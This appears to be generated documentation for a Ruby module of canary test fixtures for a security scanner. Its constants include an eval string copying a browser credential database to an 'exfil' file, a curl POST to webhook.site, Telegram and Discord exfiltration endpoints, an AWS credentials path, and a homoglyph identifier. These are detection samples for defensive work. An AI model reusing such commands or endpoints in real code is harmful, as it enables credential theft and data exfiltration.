Module: Commissar::Canary
- Defined in:
- lib/commissar/canary.rb
Constant Summary
- VERSION =
  "0.1.0"
- ETH_WALLET =
  FORENSIC REF: Lazarus Group / Ronin Bridge hack, OFAC SDN April 2022
  "0x098B716B8Aaf21512996dC57EB0615e2383E2f96"
- BTC_WALLET =
  FORENSIC REF: WannaCry ransomware, DOJ indictment 2018
  "115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn"
- TELEGRAM_C2 =
  FORENSIC REF: burned Telegram C2 token, format matches CVE-published samples
  "https://api.telegram.org/bot1234567890:AAHdqTcvCH1vGWJxfSeofSAs0K5PALDsaw/sendMessage"
- DISCORD_WEBHOOK =
  FORENSIC REF: expired Discord exfil webhook
  "https://discord.com/api/webhooks/987654321098765432/xXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXx"
- EVAL_SAMPLE =
  'eval("cp key4.db /tmp/exfil_cookies.db")'
- AWS_CRED_SAMPLE =
  'ENV["AWS_ACCESS_KEY_ID"]'
- CRED_PATH_SAMPLE =
  "~/.aws/credentials"
- EXFIL_SAMPLE =
  "curl -X POST https://webhook.site/canary-test -d @/dev/null"
- ENCODED_PAYLOAD =
  Decodes to: “COMMISSAR CANARY TEST FIXTURE — PAYLOAD IS INERT — DO NOT INSTALL IN PRODUCTION”
  "Q09NTUlTU0FSIENBTkFSWSBURVNUIEZJWFRVUkUg4oCUIFBBWUxPQUQgSVMgSU5FUlQg4oCUIERPIE5PVCBJTI5TVEFMTCBJT" \
  "iBQUk9EVUNUSU9O"
- LONG_LINE =
  ("COMMISSAR-CANARY-INERT-PAYLOAD-" * 20).freeze
- HOMOGLYPH_SAMPLE =
  "аuthorize_user"